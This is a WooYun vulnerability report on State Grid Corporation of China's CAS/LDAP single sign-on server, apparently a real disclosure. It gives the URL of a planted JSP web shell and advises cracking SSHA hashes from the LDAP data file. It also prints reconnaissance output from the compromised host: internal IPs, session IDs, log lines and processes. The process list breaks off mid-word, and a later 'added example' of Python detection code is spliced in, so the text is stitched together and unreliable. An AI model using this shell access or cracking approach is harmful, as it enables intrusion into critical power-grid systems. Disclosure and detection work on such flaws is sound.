
Vulnerability summary

Defect ID: wooyun-2015-0163057

Title: Command execution on an important State Grid Corporation of China system, with access into the intranet

Vendor: State Grid Corporation of China

Author: Forever80s

Submitted: 2015-12-21 09:45

Fixed: 2016-02-01 10:51

Published: 2016-02-01 10:51

Type: System/service patches not applied in time

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2015-12-21: Details sent to the vendor, awaiting vendor handling
2015-12-21: Vendor confirmed; details disclosed to the vendor only
2015-12-31: Details disclosed to core white hats and domain experts
2016-01-10: Details disclosed to regular white hats
2016-01-20: Details disclosed to intern white hats
2016-02-01: Details disclosed to the public

Brief description:

As per the title.

Detailed description:

The SSO login system uses CAS backed by LDAP. Download the LDAP data file, or use LdapExplorer, and recover the passwords (LDAP generally uses SSHA as its password hash algorithm). This system is the core authentication system. A shell has already been obtained and the intranet is reachable.
Site: http://iscsso.sgcc.com.cn

210.77.176.229:80  China National Electric Power Information Network
http://iscsso.sgcc.com.cn/isc_sso/login?service=http%3A%2F%2Fsgcis.sgcc.com.cn%3A8000%2Fsgcis%2Fworkspace%2Fdefault.jsp
Shell: http://iscsso.sgcc.com.cn/isc_sso/jspspy.jspx
PS F:\> ping iscsso.sgcc.com.cn
Pinging iscsso.sgcc.com.cn [210.77.176.229] with 32 bytes of data:
++++++++++++++++++++++++++++++++++++++++++++
ls
autodeploy
bin
cas.log
cas.log.1
cas.log.2
cas.log.3
config
console-ext
fileRealm.properties
init-info
lib
perfStats.log
security
servers
startManagedWebLogic_readme.txt
startWebLogic.sh
tmp
ifconfig
eth0 Link encap:Ethernet HWaddr 00:50:56:9A:0D:BE
inet addr:10.3.22.13 Bcast:10.3.22.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:21030644 errors:0 dropped:0 overruns:0 frame:0
TX packets:19477545 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:5766569714 (5.3 GiB) TX bytes:13755777092 (12.8 GiB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:23360 errors:0 dropped:0 overruns:0 frame:0
TX packets:23360 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:1967649 (1.8 MiB) TX bytes:1967649 (1.8 MiB)
uname -a
Linux iscwwatt3 2.6.32-573.3.1.el6.x86_64 #1 SMP Thu Aug 13 22:55:16 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
id
uid=400(weblogic) gid=400(bea) groups=400(bea)
/app/weblogic/Oracle/Middleware/user_projects/domains/sso_domain
find -name weblogic.xml
./servers/sso3/stage/isc_sso/isc_sso/WEB-INF/weblogic.xml
./servers/sso3/tmp/_WL_internal/bea_wls_cluster_internal/hoqa3m/war/WEB-INF/weblogic.xml
./servers/sso3/tmp/_WL_internal/bea_wls9_async_response/paujim/war/WEB-INF/weblogic.xml
./servers/sso3/tmp/_WL_internal/bea_wls_internal/d0811e/war/WEB-INF/weblogic.xml
http://iscsso.sgcc.com.cn/isc_sso/jspspy.jspx
tail ./logs/access.log
10.3.22.253 - - [20/Dec/2015:22:42:30 +0800] "GET /isc_sso/login?service=http%3A%2F%2F10.2.150.130%3A8103%2Fsgcis HTTP/1.1" 200 13866
10.3.22.253 - - [20/Dec/2015:22:42:30 +0800] "GET /isc_sso/login?service=http%3A%2F%2F10.2.150.129%3A8104%2Fsgcis HTTP/1.1" 200 13866
10.3.22.253 - - [20/Dec/2015:22:42:30 +0800] "GET /isc_sso/login?service=http%3A%2F%2F10.2.150.129%3A8103%2Fsgcis HTTP/1.1" 200 13866
10.3.22.253 - - [20/Dec/2015:22:42:31 +0800] "GET /isc_sso/login?service=http%3A%2F%2F10.2.150.129%3A8101%2Fsgcis HTTP/1.1" 200 13866
10.3.22.253 - - [20/Dec/2015:22:42:30 +0800] "POST /isc_sso/login;jsessionid=ZGt9W22KTK9b5NKLwTXlGx7y5s3T3Cwx3S8T2k4cKnxQ791jhcSv!-2042157050?service=http%3A%2F%2Fsgcis.sgcc.com.cn%3A8000%2Fsgcis%2Fworkspace%2Fdefault.jsp HTTP/1.1" 302 427
10.3.22.253 - - [20/Dec/2015:22:42:31 +0800] "GET /isc_sso/login?service=http%3A%2F%2F10.2.150.136%3A8104%2Fsgcis HTTP/1.1" 200 13866
10.3.22.253 - - [20/Dec/2015:22:42:31 +0800] "GET /isc_sso/login?service=http%3A%2F%2F10.2.150.134%3A8104%2Fsgcis HTTP/1.1" 200 13866
10.3.22.253 - - [20/Dec/2015:22:42:32 +0800] "POST /isc_sso/login;jsessionid=hpjXW22PQ7qMFG9nVtnz2Lh4BBpfHhQ29CTW2bGgXHppSjD1Yylg!-2042157050?service=http%3A%2F%2Fsgcis.sgcc.com.cn%3A8000%2F%2Fsgcis HTTP/1.1" 302 385
10.3.22.253 - - [20/Dec/2015:22:42:33 +0800] "GET /isc_sso/serviceValidate?ticket=ST-32842-OthjrbdjjwgHcb7fgEac-cas01.example.org&service=http%3A%2F%2Fsgcis.sgcc.com.cn%3A8000%2F%2Fsgcis&filter-name=ValidationFilter HTTP/1.1" 200 639
10.3.22.253 - - [20/Dec/2015:22:42:34 +0800] "GET /isc_sso/f5HealthMonitor.jsp HTTP/1.1" 200 226
root 292 0.0 0.0 0 0 ? S Nov19 0:00 [deferwq]
root 325 0.0 0.0 0 0 ? S Nov19 0:00 [kdmremove]
root 326 0.0 0.0 0 0 ? S Nov19 0:00 [kstriped]
root 430 0.0 0.0 0 0 ? S Nov19 0:00 [scsi_eh_0]
root 431 0.0 0.0 0 0 ? S Nov19 0:00 [scsi_eh_1]
root 438 0.0 0.0 0 0 ? S Nov19 0:00 [scsi_eh_2]
root 439 0.0 0.0 0 0 ? S Nov19 0:00 [vmw_pvscsi_wq_2]
root 590 0.0 0.0 0 0 ? S Nov19 0:00 [kdmflush]
root 592 0.0 0.0 0 0 ? S Nov19 0:00 [kdmflush]
root 616 0.0 0.0 0 0 ? S Nov19 2:34 [jbd2/dm-1-8]
root 617 0.0 0.0 0 0 ? S Nov19 0:00 [ext4-dio-unwrit]
root 701 0.0 0.0 11084 1176 ? S<s Nov19 0:00 /sbin/udevd -d
root 912 0.0 0.0 0 0 ? S Nov19 1:30 [vmmemctl]
root 1383 0.0 0.0 11084 1208 ? S< Nov19 0:00 /sbin/udevd -d
root 1384 0.0 0.0 11080 1196 ? S< Nov19 0:00 /sbin/udevd -d
root 1427 0.0 0.0 0 0 ? S Nov19 0:00 [jbd2/sda1-8]
root 1428 0.0 0.0 0 0 ? S Nov19 0:00 [ext4-dio-unwrit]
root 1470 0.0 0.0 0 0 ? S Nov19 0:06 [kauditd]
root 1630 0.0 0.0 0 0 ? S Nov19 1:14 [flush-253:1]
root 1823 0.0 0.0 179320 4340 ? S Nov19 34:04 /usr/sbin/vmtoolsd
root 1913 0.0 0.0 93176 888 ? S<sl Nov19 0:18 auditd
root 1938 0.0 0.0 251396 3700 ? Sl Nov19 0:10 /sbin/rsyslogd -i /var/run/syslogd.pid -c 5
root 1967 0.0 0.0 10948 680 ? Ss Nov19 14:47 irqbalance --pid=/var/run/irqbalance.pid
rpc 1985 0.0 0.0 18976 980 ? Ss Nov19 0:05 rpcbind
dbus 2086 0.0 0.0 21796 1468 ? Ss Nov19 0:31 dbus-daemon --system
root 2113 0.0 0.0 188900 3404 ? Ss Nov19 0:00 cupsd -C /etc/cups/cupsd.conf
root 2141 0.0 0.0 4080 648 ? Ss Nov19 0:00 /usr/sbin/acpid
68 2150 0.0 0.0 38988 3800 ? Ssl Nov19 0:46 hald
root 2151 0.0 0.0 20400 1164 ? S Nov19 0:00 hald-runner
root 2192 0.0 0.0 22520 1084 ? S Nov19 0:00 hald-addon-input: Listening on /dev/input/event2 /dev/input/event0
68 2198 0.0 0.0 18008 1028 ? S Nov19 0:00 hald-addon-acpi: listeni
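As an added example (not part of the original report), detection logic a defender could run over the WebLogic access log shown above: it parses lines in the same format and flags requests for JSP/JSPX resources under /isc_sso/ that the CAS application is not known to serve, which is how a dropped shell such as jspspy.jspx surfaces in the log. The allow-list of legitimate endpoints is an assumption taken from the log excerpt, and the sample lines are constructed.

```python
import re
from urllib.parse import urlsplit

# One line of the WebLogic access log in the format shown in the report.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)$'
)

# Endpoints the CAS application legitimately serves. Assumption: taken from the
# paths visible in the report's log excerpt; a real deployment lists its own.
ALLOWED_PATHS = {
    "/isc_sso/login",
    "/isc_sso/serviceValidate",
    "/isc_sso/f5HealthMonitor.jsp",
}

def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    # Drop the query string and any ";jsessionid=..." path parameter before comparing.
    rec["path"] = urlsplit(rec["target"]).path.split(";", 1)[0]
    return rec

def suspicious_requests(lines):
    """Return (ip, path, status) for requests to JSP/JSPX resources under /isc_sso/
    that are not known endpoints, i.e. candidates for a dropped web shell."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        p = rec["path"]
        if (p.startswith("/isc_sso/") and p not in ALLOWED_PATHS
                and p.lower().endswith((".jsp", ".jspx"))):
            hits.append((rec["ip"], p, int(rec["status"])))
    return hits

# Constructed sample lines in the same format as the report's access.log; the
# last one models a request to the jspspy.jspx shell path named in the report.
SAMPLE = [
    '10.3.22.253 - - [20/Dec/2015:22:42:30 +0800] "GET /isc_sso/login?service=http%3A%2F%2F10.2.150.130%3A8103%2Fsgcis HTTP/1.1" 200 13866',
    '10.3.22.253 - - [20/Dec/2015:22:42:34 +0800] "GET /isc_sso/f5HealthMonitor.jsp HTTP/1.1" 200 226',
    '10.3.22.253 - - [20/Dec/2015:22:42:30 +0800] "POST /isc_sso/login;jsessionid=ZGt9W22K!-2042157050?service=http%3A%2F%2Fsgcis HTTP/1.1" 302 427',
    '10.3.22.253 - - [20/Dec/2015:22:45:01 +0800] "POST /isc_sso/jspspy.jspx HTTP/1.1" 200 4812',
]
```

Calling `suspicious_requests(SAMPLE)` returns a single hit for the jspspy.jspx request; the login, health-monitor and jsessionid-bearing lines are all recognised as legitimate endpoints.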


[Extract of the downloaded WebLogic embedded LDAP data file under ou=myrealm,dc=sso_domain, listing the realm's standard groups (Administrators, Deployers, Operators, Monitors, AppTesters, CrossDomainConnectors, AdminChannelUsers); the binary dump is garbled in extraction and is omitted here.]

Proof of vulnerability:

Fix recommendation:

Copyright notice: when reposting, please credit the source: Forever80s@WooYun


Vulnerability response

Vendor response:

Severity: High

Rank: 15

Confirmed: 2015-12-21 11:22

Vendor reply:

Thanks for the submission

Latest status:

2015-12-31: Thanks for your help; please contact the vendor to collect a gift.